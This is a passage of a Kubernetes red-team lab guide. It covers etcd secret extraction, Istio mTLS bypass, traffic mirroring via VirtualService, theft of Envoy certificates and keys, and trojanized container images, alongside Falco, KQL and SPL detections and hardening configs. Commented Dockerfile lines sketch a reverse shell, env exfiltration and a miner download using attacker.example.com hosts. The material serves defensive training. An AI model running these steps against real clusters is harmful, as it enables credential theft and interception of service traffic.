From etcd, 18 secrets were extracted across all namespaces including:
- Database credentials (PostgreSQL connection strings)
- Authentication secrets (JWT signing keys, OAuth client secrets)
- TLS certificates and private keys
- Container registry credentials
- Cloud provider configuration (AWS credentials)
- etcd TLS certificates (self-referential — access to etcd grants more etcd access)
Step 3.5: Demonstrate Encryption at Rest Gap¶
# Check if etcd encryption at rest is configured
$ cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep encryption
# If no output — encryption at rest is NOT configured
# Check for EncryptionConfiguration
$ ls /etc/kubernetes/enc/
ls: cannot access '/etc/kubernetes/enc/': No such file or directory
# Encryption config does not exist — secrets are stored in plaintext
# What proper encryption configuration looks like:
$ cat <<'EOF'
# RECOMMENDED: EncryptionConfiguration for secrets at rest
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
      - configmaps
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: REDACTED-BASE64-ENCODED-32-BYTE-KEY
      - identity: {}  # Fallback for reading unencrypted data
EOF
# To enable, add to kube-apiserver manifest:
# --encryption-provider-config=/etc/kubernetes/enc/encryption-config.yaml
Detection: etcd Access¶
Falco Rules¶
# Falco rule: Detect etcdctl execution on control plane
- rule: etcdctl Executed on Control Plane
  desc: etcdctl command was executed — potential secret extraction
  condition: >
    spawned_process and proc.name = "etcdctl"
    and not user.name in (etcd_maintenance_users)
  output: >
    etcdctl executed (user=%user.name command=%proc.cmdline
    parent=%proc.pname container=%container.name)
  priority: CRITICAL
  tags: [etcd, secrets, credential_access, T1552]
# Falco rule: Detect reading etcd certificate files
- rule: etcd Certificate Files Read
  desc: Process reading etcd TLS certificates — potential etcd access preparation
  condition: >
    open_read and fd.name startswith /etc/kubernetes/pki/etcd/
    and not proc.name in (etcd, kube-apiserver, kubelet)
  output: >
    etcd certificate file read by unexpected process
    (file=%fd.name process=%proc.name user=%user.name)
  priority: WARNING
  tags: [etcd, certificate, credential_access]
KQL Detection¶
// KQL: Detect etcd access from non-API-server processes
// This requires node-level audit logging (e.g., Azure Monitor agent on AKS nodes)
Syslog
| where SyslogMessage has "etcdctl" or (SyslogMessage has "etcd" and SyslogMessage has "get")
| where ProcessName != "kube-apiserver" and ProcessName != "etcd"
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| sort by TimeGenerated desc
// KQL: Detect etcd port access from unexpected sources
AzureNetworkAnalytics_CL
| where DestPort_d == 2379 or DestPort_d == 2380
| where SrcIP_s !in ("10.60.1.10", "10.60.1.11", "10.60.1.12") // Expected control plane nodes
| project TimeGenerated, SrcIP_s, DestIP_s, DestPort_d, FlowStatus_s
| sort by TimeGenerated desc
// KQL: Detect bulk secret reads via Kubernetes API (alternative path)
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "list" and AuditLog.objectRef.resource == "secrets"
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
SourceIP = AuditLog.sourceIPs[0]
| summarize SecretListCount = count() by User, bin(TimeGenerated, 5m)
| where SecretListCount > 5
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect etcdctl execution
index=os (sourcetype="syslog" OR sourcetype="linux:audit")
("etcdctl" AND ("get" OR "watch" OR "snapshot"))
| eval severity=case(
searchmatch("--prefix"), "CRITICAL",
searchmatch("/registry/secrets"), "CRITICAL",
1=1, "HIGH"
)
| table _time, host, user, process, cmdline, severity
// SPL: Detect etcd port connections from unexpected sources
index=network sourcetype="firewall" dest_port IN (2379, 2380)
| where NOT cidrmatch("10.60.1.0/24", src_ip)
| table _time, src_ip, dest_ip, dest_port, action
// SPL: Detect bulk secret reads through Kubernetes API
index=kubernetes sourcetype="kube:audit"
verb IN ("get", "list") objectRef.resource=secrets
| spath output=user path=user.username
| bin _time span=1m
| stats count as secret_reads, dc(objectRef.namespace) as namespaces by user, _time
| where secret_reads > 10 OR namespaces > 2
| table _time, user, secret_reads, namespaces
Defensive Measures: Protecting etcd¶
Prevention Controls
1. Enable Encryption at Rest
# /etc/kubernetes/enc/encryption-config.yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
      - configmaps
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: REDACTED-BASE64-ENCODED-32-BYTE-KEY
      - identity: {}
Add to kube-apiserver: --encryption-provider-config=/etc/kubernetes/enc/encryption-config.yaml
2. Use External Secrets Management
# Use External Secrets Operator with HashiCorp Vault or AWS Secrets Manager
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: db-credentials
  namespace: skyforge-prod
spec:
  refreshInterval: 1h
  secretStoreRef:
    name: vault-backend
    kind: ClusterSecretStore
  target:
    name: db-credentials
  data:
    - secretKey: password
      remoteRef:
        key: skyforge/database
        property: password
3. Restrict etcd Network Access
- etcd should only be accessible from the API server
- Use network policies / firewall rules to restrict port 2379/2380
- Enable mutual TLS for all etcd communications
4. etcd Client Certificate Rotation
Rotate etcd certificates regularly and restrict file permissions:
chmod 600 /etc/kubernetes/pki/etcd/*.key
chmod 644 /etc/kubernetes/pki/etcd/*.crt
chown root:root /etc/kubernetes/pki/etcd/*
5. Regular Secret Auditing
Exercise 3 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 3.1 | etcd identification | etcd accessible with node certs | Critical |
| 3.2 | Key enumeration | Full cluster state visible in etcd | Critical |
| 3.3 | Secret extraction | Database credentials decoded | Critical |
| 3.4 | Bulk extraction | 18 secrets across all namespaces | Critical |
| 3.5 | Encryption audit | No encryption at rest configured | Critical |
Exercise 4: Service Mesh Attacks¶
Time Estimate: 60–75 minutes ATT&CK Mapping: T1557 (Adversary-in-the-Middle), T1071.001 (Application Layer Protocol: Web Protocols)
Objectives¶
- Bypass Istio mTLS by communicating directly between pods without the mesh
- Manipulate Istio VirtualService resources to hijack traffic between services
- Extract service mesh certificates from sidecar containers
- Demonstrate sidecar injection attacks
- Detect service mesh tampering through Istio telemetry and audit logs
Background¶
Service meshes like Istio provide mutual TLS (mTLS), traffic management, and observability. However, a misconfigured service mesh can create a false sense of security. If mTLS is set to PERMISSIVE mode instead of STRICT, pods can communicate without encryption. An attacker with RBAC access to Istio custom resources (VirtualService, DestinationRule, Gateway) can redirect traffic, inject sidecars with malicious configurations, or extract mesh certificates for impersonation.
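The PERMISSIVE-versus-STRICT distinction can be checked mechanically. A minimal sketch (helper names are illustrative) operating on PeerAuthentication objects shaped like `kubectl get peerauthentication -o json` output:

```python
# Hypothetical mesh-policy audit: flag PeerAuthentication policies whose
# mTLS mode is not STRICT. An absent mode ("UNSET") inherits from the
# parent policy, so it is also worth surfacing for review.
def weak_mtls_policies(policies):
    findings = []
    for p in policies:
        mode = p.get("spec", {}).get("mtls", {}).get("mode", "UNSET")
        if mode != "STRICT":
            ns = p["metadata"]["namespace"]
            name = p["metadata"]["name"]
            findings.append(f"{ns}/{name}: mode={mode}")
    return findings

policies = [
    {"metadata": {"namespace": "istio-system", "name": "default"},
     "spec": {"mtls": {"mode": "PERMISSIVE"}}},
    {"metadata": {"namespace": "skyforge-staging", "name": "default"},
     "spec": {"mtls": {"mode": "STRICT"}}},
]
print(weak_mtls_policies(policies))  # ['istio-system/default: mode=PERMISSIVE']
```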
Step 4.1: Enumerate Service Mesh Configuration¶
# Check if Istio is installed and which version
$ k get pods -n istio-system
NAME READY STATUS RESTARTS AGE
istio-ingressgateway-7b4c9d5f8-x9k2m 1/1 Running 0 5d
istiod-6f8c4d9b7-p4m2n 1/1 Running 0 5d
$ k get svc -n istio-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S)
istio-ingressgateway LoadBalancer 10.96.0.100 203.0.113.42 80:30080/TCP,443:30443/TCP
istiod ClusterIP 10.96.0.50 <none> 15010/TCP,15012/TCP,443/TCP,15014/TCP
# Check mTLS mode
$ k get peerauthentication --all-namespaces
NAMESPACE NAME MODE AGE
istio-system default PERMISSIVE 5d
skyforge-prod mesh-policy PERMISSIVE 5d
# Check if all pods have sidecar injection
$ k get pods -n skyforge-prod -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].name}{"\n"}{end}'
data-processor processor
auth-service-xxx auth istio-proxy
auth-service-yyy auth istio-proxy
api-gateway-xxx gateway istio-proxy
api-gateway-yyy gateway istio-proxy
api-gateway-zzz gateway istio-proxy
report-engine-xxx reports istio-proxy
Finding: mTLS in PERMISSIVE Mode
The mesh-wide mTLS policy is set to PERMISSIVE, meaning pods accept both encrypted (mTLS) and plaintext connections. An attacker inside the mesh can bypass mTLS entirely by sending plaintext HTTP directly to pod IPs, bypassing the Envoy sidecar.
Finding: data-processor Pod Missing Sidecar
The compromised data-processor pod does not have an istio-proxy sidecar container. This means it operates outside the mesh's mTLS and traffic policy enforcement. It can communicate with any pod using plaintext, bypassing all mesh policies.
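Pods running outside the mesh can be enumerated the same way the kubectl one-liner above does it. A minimal sketch (helper names are illustrative) over pod objects shaped like `kubectl get pods -o json` output:

```python
# Hypothetical coverage check: list pods whose container set lacks the
# istio-proxy sidecar, i.e., workloads outside mesh policy enforcement.
def pods_without_sidecar(pods):
    missing = []
    for pod in pods:
        names = [c["name"] for c in pod["spec"]["containers"]]
        if "istio-proxy" not in names:
            missing.append(pod["metadata"]["name"])
    return missing

pods = [
    {"metadata": {"name": "data-processor"},
     "spec": {"containers": [{"name": "processor"}]}},
    {"metadata": {"name": "auth-service-abc123"},
     "spec": {"containers": [{"name": "auth"}, {"name": "istio-proxy"}]}},
]
print(pods_without_sidecar(pods))  # ['data-processor']
```

Defenders can run this as a periodic coverage audit; a non-empty result means some traffic bypasses mesh mTLS and authorization policies entirely.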
Step 4.2: Bypass mTLS — Direct Pod Communication¶
# From the data-processor pod (no sidecar), communicate directly with auth-service
# Bypass the mesh by hitting the pod IP instead of the service
# Get auth-service pod IP
$ k get pods -n skyforge-prod -l app=auth-service -o wide
NAME READY STATUS IP NODE
auth-service-abc123 2/2 Running 10.244.1.15 ip-10-60-1-20.ec2.internal
auth-service-def456 2/2 Running 10.244.2.22 ip-10-60-1-30.ec2.internal
# Direct HTTP request to auth-service pod (bypassing Envoy sidecar)
# Because mTLS is PERMISSIVE, the application port accepts plaintext
$ curl -s http://10.244.1.15:8080/api/v1/users/1
{
  "id": 1,
  "username": "admin",
  "email": "admin@helios.example.com",
  "role": "cluster-admin",
  "last_login": "2026-04-07T07:30:00Z"
}
# This request was NOT encrypted, NOT logged by Istio telemetry,
# and NOT subject to Istio authorization policies
Finding: mTLS Bypass Successful
By communicating directly to the pod IP on the application port, the attacker bypasses the Envoy sidecar entirely. This means:
- No mTLS encryption on the wire
- No Istio access logs for the request
- No Istio AuthorizationPolicy enforcement
- No rate limiting or traffic management
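The curl above can be reproduced with nothing but the standard library, which is useful for scripted PERMISSIVE-mode probing. A hedged sketch (function name is illustrative; the target IP/port are the synthetic values from this step): under STRICT mTLS the sidecar resets a plaintext connection, while under PERMISSIVE the application answers in the clear.

```python
# Plaintext HTTP probe: returns the response status line if the target
# accepts an unencrypted connection, None if the connection fails
# (e.g., reset by a sidecar enforcing STRICT mTLS).
import socket

def plaintext_probe(host, port, path="/", timeout=3):
    req = f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(req.encode())
            return s.recv(4096).split(b"\r\n", 1)[0].decode()
    except OSError:
        return None

# In the lab environment:
# plaintext_probe("10.244.1.15", 8080, "/api/v1/users/1")
# A status line in the result means plaintext was accepted.
```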
Step 4.3: Traffic Hijacking via VirtualService Manipulation¶
# With cluster-admin (from Exercise 2), modify Istio VirtualService
# to redirect traffic destined for auth-service to our data-processor pod
# First, check existing VirtualServices
$ k get virtualservices -n skyforge-prod
NAME GATEWAYS HOSTS AGE
api-gateway-vs [mesh] [api.helios.example.com] 5d
auth-service-vs [mesh] [auth-service] 5d
$ k get virtualservice auth-service-vs -n skyforge-prod -o yaml
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: auth-service-vs
  namespace: skyforge-prod
spec:
  hosts:
    - auth-service
  http:
    - route:
        - destination:
            host: auth-service
            port:
              number: 8080
          weight: 100
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Modify VirtualService to mirror traffic to attacker-controlled endpoint
$ cat <<'EOF' | k apply -f -
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
  name: auth-service-vs
  namespace: skyforge-prod
spec:
  hosts:
    - auth-service
  http:
    - route:
        - destination:
            host: auth-service
            port:
              number: 8080
          weight: 100
      mirror:
        host: data-processor
        port:
          number: 9090
      mirrorPercentage:
        value: 100.0
EOF
virtualservice.networking.istio.io/auth-service-vs configured
# Now ALL traffic to auth-service is mirrored to our data-processor pod
# This includes authentication requests with credentials
Finding: Traffic Mirroring Attack
By modifying the Istio VirtualService, the attacker mirrors 100% of auth-service traffic to the compromised pod. This captures authentication tokens, credentials, and sensitive API payloads without disrupting the legitimate service. This is a stealthy man-in-the-middle attack using the service mesh itself.
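Because mirror stanzas should be rare and change-controlled in production, they make a good audit target. A minimal detection sketch (helper names are illustrative) over VirtualService objects shaped like `kubectl get virtualservices -o json` output:

```python
# Hypothetical mesh audit: report any VirtualService HTTP route that
# mirrors traffic, with the mirror percentage and destination host.
def mirrored_routes(virtualservices):
    findings = []
    for vs in virtualservices:
        for route in vs.get("spec", {}).get("http", []):
            mirror = route.get("mirror")
            if mirror:
                pct = route.get("mirrorPercentage", {}).get("value", 100.0)
                findings.append(
                    f"{vs['metadata']['name']}: mirrors {pct}% to {mirror['host']}")
    return findings

vs = {
    "metadata": {"name": "auth-service-vs"},
    "spec": {"http": [{
        "route": [{"destination": {"host": "auth-service"}}],
        "mirror": {"host": "data-processor"},
        "mirrorPercentage": {"value": 100.0},
    }]},
}
print(mirrored_routes([vs]))  # ['auth-service-vs: mirrors 100.0% to data-processor']
```

Diffing this report against a known-good baseline on every sync catches the Step 4.3 tampering within one audit interval.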
Step 4.4: Extract Service Mesh Certificates¶
# Istio sidecar proxies hold mTLS certificates — extract them
# from a pod that has the istio-proxy sidecar
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Connect to the auth-service's istio-proxy sidecar
$ k exec -it auth-service-abc123 -n skyforge-prod -c istio-proxy -- /bin/bash
# Istio stores certificates in /etc/certs/ or via SDS
$ ls /etc/certs/ 2>/dev/null || echo "SDS mode — certs delivered via Envoy SDS API"
SDS mode — certs delivered via Envoy SDS API
# Check Envoy admin interface for certificate information
$ curl -s localhost:15000/certs
{
"certificates": [
{
"ca_cert": [
{
"path": "\u003cinline\u003e",
"serial_number": "REDACTED",
"subject_alt_names": [
{
"uri": "spiffe://cluster.local/ns/istio-system/sa/istiod"
}
],
"days_until_expiration": "364",
"valid_from": "2026-04-07T00:00:00Z",
"expiration_time": "2027-04-07T00:00:00Z"
}
],
"cert_chain": [
{
"path": "\u003cinline\u003e",
"serial_number": "REDACTED",
"subject_alt_names": [
{
"uri": "spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa"
}
],
"days_until_expiration": "0",
"valid_from": "2026-04-07T08:00:00Z",
"expiration_time": "2026-04-08T08:00:00Z"
}
]
}
]
}
# Extract the actual certificate and key from Envoy SDS
$ curl -s localhost:15000/config_dump | jq '.configs[] | select(.["@type"] | contains("SecretsConfigDump"))' > secrets_dump.json
# The certificate chain and private key are in the SDS response
$ cat secrets_dump.json | jq -r '.dynamic_active_secrets[0].secret.tls_certificate.certificate_chain.inline_bytes' | base64 -d
-----BEGIN CERTIFICATE-----
REDACTED-CERTIFICATE-DATA
-----END CERTIFICATE-----
$ cat secrets_dump.json | jq -r '.dynamic_active_secrets[0].secret.tls_certificate.private_key.inline_bytes' | base64 -d
-----BEGIN RSA PRIVATE KEY-----
REDACTED-PRIVATE-KEY-DATA
-----END RSA PRIVATE KEY-----
Finding: Service Mesh Certificates Extractable
An attacker with pod exec access can extract the mTLS certificates from the Envoy sidecar. These certificates can be used to impersonate the service identity (spiffe://cluster.local/ns/skyforge-prod/sa/auth-service-sa) when communicating with other mesh services — effectively stealing the service's identity.
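The jq pipeline above can be wrapped in a small parser. A sketch, assuming the config_dump JSON follows the SecretsConfigDump layout shown in the capture (field names are taken from that output, not from a guaranteed Envoy schema):

```python
import base64


def extract_tls_material(config_dump: dict):
    """Pull the PEM certificate chain and private key out of an Envoy
    /config_dump SecretsConfigDump section, mirroring the jq commands above."""
    for section in config_dump.get("configs", []):
        if "SecretsConfigDump" not in section.get("@type", ""):
            continue
        for entry in section.get("dynamic_active_secrets", []):
            tls = entry.get("secret", {}).get("tls_certificate")
            if not tls:
                continue
            # inline_bytes fields are base64-encoded PEM blobs
            chain = base64.b64decode(tls["certificate_chain"]["inline_bytes"]).decode()
            key = base64.b64decode(tls["private_key"]["inline_bytes"]).decode()
            return chain, key
    return None, None
```

The same parser is useful defensively: run it from a trusted sidecar-audit job and alert if workload certificates ever appear outside the expected pods.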
Step 4.5: Sidecar Injection Attack¶
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Manipulate the sidecar injector to inject a malicious container alongside
# legitimate workloads. This requires cluster-admin access.
# Check current sidecar injection configuration
$ k get configmap istio-sidecar-injector -n istio-system -o jsonpath='{.data.config}' | head -20
policy: enabled
alwaysInjectSelector: []
neverInjectSelector: []
template: |
...
# An attacker could modify the sidecar template to include a data exfiltration container
# or modify the Envoy configuration to log all traffic to an external endpoint
# Verify which namespaces have auto-injection enabled
$ k get namespaces -l istio-injection=enabled
NAME STATUS AGE
skyforge-prod Active 5d
skyforge-staging Active 5d
Detection: Service Mesh Attacks¶
Falco Rules¶
# Falco rule: Detect VirtualService modification
- rule: Istio VirtualService Modified
desc: VirtualService resource was created or modified — potential traffic hijacking
condition: >
kevt and (kcreate or kupdate) and
ka.target.resource = "virtualservices"
output: >
Istio VirtualService modified (user=%ka.user.name action=%ka.verb
name=%ka.target.name ns=%ka.target.namespace)
priority: HIGH
tags: [k8s, istio, service_mesh, traffic_hijack]
# Falco rule: Detect Envoy admin API access
- rule: Envoy Admin API Accessed
desc: Process accessed Envoy admin API — potential certificate theft
condition: >
container and fd.sport = 15000 and evt.type in (connect, accept)
and not proc.name in (pilot-agent, envoy)
output: >
Envoy admin API accessed (user=%user.name process=%proc.name
container=%container.name pod=%k8s.pod.name)
priority: HIGH
tags: [istio, envoy, admin_api]
KQL Detection¶
// KQL: Detect Istio VirtualService modification
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.objectRef.resource == "virtualservices"
and AuditLog.verb in ("create", "update", "patch")
| extend HasMirror = AuditLog.requestObject has "mirror"
| project TimeGenerated,
User = AuditLog.user.username,
Action = AuditLog.verb,
VirtualService = AuditLog.objectRef.name,
Namespace = AuditLog.objectRef.namespace,
HasMirror,
SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc
// KQL: Detect direct pod-to-pod communication bypassing mesh
// Requires Istio access logs ingested into Sentinel
IstioAccessLogs_CL
| where response_flags_s has "NR" // No route — request bypassed the mesh
| project TimeGenerated, source_workload_s, destination_workload_s,
request_path_s, response_code_d, response_flags_s
| sort by TimeGenerated desc
// KQL: Detect Envoy admin API access
ContainerLog
| where LogEntry has "localhost:15000" or LogEntry has "127.0.0.1:15000"
| where ContainerName != "istio-proxy"
| project TimeGenerated, PodName, ContainerName, LogEntry
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect VirtualService modification with mirror config
index=kubernetes sourcetype="kube:audit"
objectRef.resource=virtualservices verb IN ("create", "update", "patch")
| spath "requestObject" as request_body
| eval has_mirror=if(match(request_body, "mirror"), "YES", "NO")
| table _time, user.username, verb, objectRef.name, objectRef.namespace, has_mirror
// SPL: Detect mTLS bypass — plaintext connections to mesh services
index=istio sourcetype="istio:accesslog"
| where NOT match(upstream_transport_failure_reason, "^$")
OR tls_version="none"
| table _time, source_workload, destination_workload, request_path,
response_code, tls_version
// SPL: Detect Envoy admin API access from unexpected processes
index=kubernetes sourcetype="kube:container-logs"
("localhost:15000" OR "127.0.0.1:15000")
| where container_name!="istio-proxy"
| table _time, pod_name, container_name, log
Defensive Measures: Securing the Service Mesh¶
Prevention Controls
1. Enforce STRICT mTLS Mode
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
name: default
namespace: istio-system # Mesh-wide
spec:
mtls:
mode: STRICT # Reject ALL plaintext connections
2. Require Sidecar Injection for All Workloads
apiVersion: v1
kind: Namespace
metadata:
name: skyforge-prod
labels:
istio-injection: enabled
---
# OPA policy to reject pods without sidecar
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sRequiredSidecar
metadata:
name: require-istio-sidecar
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
namespaces: ["skyforge-prod"]
parameters:
sidecarName: istio-proxy
3. Restrict Istio CRD Modification
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: istio-crd-readonly
rules:
- apiGroups: ["networking.istio.io", "security.istio.io"]
resources: ["*"]
verbs: ["get", "list", "watch"]
# Only mesh admins should have create/update/delete
4. Disable Envoy Admin API in Production
Set ISTIO_META_ENABLE_ADMIN_INTERFACE=false in the sidecar container or restrict to localhost with proxyAdmin port disabled.
5. Enable Istio Authorization Policies
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
name: auth-service-policy
namespace: skyforge-prod
spec:
selector:
matchLabels:
app: auth-service
rules:
- from:
- source:
principals: ["cluster.local/ns/skyforge-prod/sa/api-gateway-sa"]
to:
- operation:
methods: ["GET", "POST"]
paths: ["/api/v1/*"]
Exercise 4 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 4.1 | Mesh enumeration | mTLS in PERMISSIVE mode, missing sidecar | High |
| 4.2 | mTLS bypass | Direct plaintext pod-to-pod communication | High |
| 4.3 | Traffic hijacking | VirtualService mirror attack | Critical |
| 4.4 | Certificate extraction | mTLS certs and private keys extracted | Critical |
| 4.5 | Sidecar injection | Sidecar injector modifiable by admin | High |
Exercise 5: Supply Chain & Image Attacks¶
Time Estimate: 45–60 minutes ATT&CK Mapping: T1195.002 (Supply Chain Compromise), T1525 (Implant Internal Image)
Objectives¶
- Identify vulnerable base images in the container registry using Trivy
- Understand how a trojanized container image is constructed (educational pseudocode)
- Exploit image pull policies to force deployment of malicious images
- Demonstrate admission control bypass techniques
- Implement image signing verification with Cosign and admission webhooks
Background¶
Supply chain attacks targeting container images are among the most impactful in cloud-native environments. A compromised base image or CI/CD pipeline can introduce backdoors into every deployment. Kubernetes image pull policies, admission controllers, and image signing are the primary defenses — but misconfigurations in any of these layers create exploitable gaps.
Step 5.1: Identify Vulnerable Base Images¶
# Scan the data-processor image for vulnerabilities
$ trivy image registry.helios.example.com/skyforge/data-processor:2.1.0
# Expected Output (SYNTHETIC)
registry.helios.example.com/skyforge/data-processor:2.1.0 (debian 12.4)
============================================================
Total: 247 (UNKNOWN: 3, LOW: 42, MEDIUM: 108, HIGH: 71, CRITICAL: 23)
┌──────────────────┬──────────────────┬──────────┬────────────────┬──────────────┬──────────────────────────────────────────┐
│ Library │ Vulnerability │ Severity │ Installed Ver │ Fixed Ver │ Title │
├──────────────────┼──────────────────┼──────────┼────────────────┼──────────────┼──────────────────────────────────────────┤
│ openssl │ CVE-2024-XXXXX │ CRITICAL │ 3.0.11 │ 3.0.13 │ Buffer overflow in X.509 certificate │
│ │ │ │ │ │ verification │
│ curl │ CVE-2024-YYYYY │ CRITICAL │ 7.88.1 │ 8.5.0 │ SOCKS5 heap buffer overflow │
│ glibc │ CVE-2024-ZZZZZ │ CRITICAL │ 2.36 │ 2.38 │ Stack-based buffer overflow in getaddrinfo│
│ python3.11 │ CVE-2024-AAAAA │ HIGH │ 3.11.2 │ 3.11.8 │ Path traversal in zipfile module │
│ pip │ CVE-2024-BBBBB │ HIGH │ 23.0.1 │ 24.0 │ Command injection via requirements file │
│ libssh2 │ CVE-2024-CCCCC │ HIGH │ 1.10.0 │ 1.11.0 │ Authentication bypass in keyboard- │
│ │ │ │ │ │ interactive auth │
│ numpy │ CVE-2024-DDDDD │ MEDIUM │ 1.24.2 │ 1.26.0 │ Denial of service in array processing │
│ ... │ ... │ ... │ ... │ ... │ ... │
└──────────────────┴──────────────────┴──────────┴────────────────┴──────────────┴──────────────────────────────────────────┘
# Check for secrets embedded in image layers
$ trivy image --scanners secret registry.helios.example.com/skyforge/data-processor:2.1.0
# Expected Output (SYNTHETIC)
registry.helios.example.com/skyforge/data-processor:2.1.0 (secrets)
============================================================
Total: 3 (HIGH: 2, CRITICAL: 1)
┌─────────────────────────┬──────────┬──────────────────────────────────────────┐
│ Category │ Severity │ Match │
├─────────────────────────┼──────────┼──────────────────────────────────────────┤
│ AWS Access Key │ CRITICAL │ AKIAIOSFODNN7EXAMPLE (layer 3) │
│ Private Key │ HIGH │ -----BEGIN RSA PRIVATE KEY----- (layer 5)│
│ Generic Password │ HIGH │ DB_PASSWORD=REDACTED (layer 2, ENV) │
└─────────────────────────┴──────────┴──────────────────────────────────────────┘
Finding: Critical Vulnerabilities and Embedded Secrets
The data-processor image has 23 CRITICAL and 71 HIGH vulnerabilities, plus embedded secrets including an AWS access key and private key in the image layers. Even if environment variables are changed at runtime, secrets baked into image layers are permanently recoverable from the image history.
# Scan all images in the cluster
$ for pod in $(k get pods -n skyforge-prod -o jsonpath='{.items[*].spec.containers[*].image}'); do
echo "=== Scanning: $pod ==="
trivy image --severity HIGH,CRITICAL --quiet "$pod"
done
# Expected Summary (SYNTHETIC)
=== Scanning: registry.helios.example.com/skyforge/data-processor:2.1.0 ===
HIGH: 71, CRITICAL: 23
=== Scanning: registry.helios.example.com/skyforge/auth-service:1.8.3 ===
HIGH: 34, CRITICAL: 8
=== Scanning: registry.helios.example.com/skyforge/api-gateway:3.2.1 ===
HIGH: 12, CRITICAL: 2
=== Scanning: registry.helios.example.com/skyforge/report-engine:1.4.0 ===
HIGH: 45, CRITICAL: 15
Step 5.2: Trojanized Container Image (Educational Pseudocode)¶
Educational Content Only
The following demonstrates how a supply chain attack works conceptually. All code is pseudocode for defensive understanding. No functional malware is provided.
# EDUCATIONAL PSEUDOCODE — NOT FUNCTIONAL CODE
# Demonstrates how an attacker might trojanize a base image
# Purpose: Understanding the threat model for detection and prevention
# Start with the legitimate base image
FROM registry.helios.example.com/skyforge/base-image:latest
# ATTACK VECTOR 1: Add a reverse shell that activates on container start
# (PSEUDOCODE — educational illustration only)
# RUN echo '#!/bin/bash' > /usr/local/bin/health-check.sh && \
# echo '# PSEUDOCODE: establish_reverse_connection(attacker_c2.example.com, 443)' >> /usr/local/bin/health-check.sh && \
# chmod +x /usr/local/bin/health-check.sh
# ATTACK VECTOR 2: Modify the entrypoint to exfiltrate environment variables
# (PSEUDOCODE — educational illustration only)
# ENTRYPOINT ["/bin/sh", "-c", "env | PSEUDOCODE_SEND_TO(attacker.example.com); exec $@"]
# ATTACK VECTOR 3: Add a cryptominer as a background process
# (PSEUDOCODE — educational illustration only)
# RUN curl -o /usr/local/bin/system-monitor https://attacker.example.com/PSEUDOCODE_MINER && \
# chmod +x /usr/local/bin/system-monitor
# ATTACK VECTOR 4: Modify libraries to intercept credentials
# (PSEUDOCODE — educational illustration only)
# RUN pip install PSEUDOCODE_BACKDOORED_PACKAGE==1.0.0
Key Takeaways for Defenders:
- Image layers are additive — every RUN, COPY, or ADD creates a new layer
- Secrets in any layer are permanently recoverable via docker history or docker save
- Modified entrypoints or added binaries may not be visible to vulnerability scanners
- Behavioral analysis (Falco) and image comparison tools are needed to detect trojanized images
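The "secrets survive in layers" takeaway can be operationalized with a simple scanner over a docker save tarball. A minimal sketch, with illustrative secret patterns; note that a real docker save archive nests per-layer tars inside the outer tarball, so a production version would recurse with a second tarfile pass:

```python
import re
import tarfile

# Illustrative patterns only: AWS access key IDs and PEM private key headers
SECRET_PATTERNS = [
    re.compile(rb"AKIA[0-9A-Z]{16}"),
    re.compile(rb"-----BEGIN (?:RSA )?PRIVATE KEY-----"),
]


def scan_image_tarball(path: str) -> list:
    """Scan every regular file in an image tarball for secret-looking
    byte patterns; returns (member_name, matched_text) pairs."""
    findings = []
    with tarfile.open(path) as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            for pattern in SECRET_PATTERNS:
                for match in pattern.findall(data):
                    findings.append((member.name, match.decode(errors="replace")))
    return findings
```

Trivy's secret scanner (Step 5.1) does this properly across nested layers; the sketch just shows why "deleted" secrets remain recoverable from saved image content.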
Step 5.3: Exploit Image Pull Policies¶
# Check current image pull policies across all pods
$ k get pods -n skyforge-prod -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].imagePullPolicy}{"\n"}{end}'
data-processor IfNotPresent
auth-service-abc123 IfNotPresent
auth-service-def456 IfNotPresent
api-gateway-xxx IfNotPresent
api-gateway-yyy IfNotPresent
api-gateway-zzz IfNotPresent
report-engine-xxx IfNotPresent
# The issue: IfNotPresent means once an image is cached on a node,
# it will NEVER be re-pulled — even if the registry image has been updated
# (e.g., replaced with a trojanized version)
# Demonstrate the attack:
# 1. Attacker pushes trojanized image to registry with SAME tag
# EDUCATIONAL PSEUDOCODE:
# $ docker push registry.helios.example.com/skyforge/data-processor:2.1.0
# (trojanized version overwrites the legitimate tag)
# 2. With IfNotPresent: existing pods keep running the old (safe) image
# BUT: any NEW pod scheduled on a node that doesn't have the image cached
# will pull the trojanized version
# 3. Force a rollout to trigger new pulls:
# EDUCATIONAL PSEUDOCODE:
# $ k rollout restart deployment/data-processor -n skyforge-prod
